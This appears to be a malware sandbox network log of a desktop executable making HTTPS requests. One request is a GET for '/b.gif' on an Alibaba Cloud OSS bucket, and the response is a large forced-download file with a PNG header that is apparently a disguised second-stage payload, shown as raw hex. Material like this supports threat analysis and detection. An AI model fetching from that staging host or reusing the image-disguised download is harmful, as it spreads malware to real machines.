2025-01-13 01:06:35 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2025-01-13 01:06:35 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49987	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:36 UTC	107	OUT	GET /b.gif HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:37 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:37 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 6784671D897E3135352812F0 Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Sun, 12 Jan 2025 11:34:49 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 2
2025-01-13 01:06:37 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a Data Ascii: _X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-13 01:06:37 UTC	4096	IN	Data Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
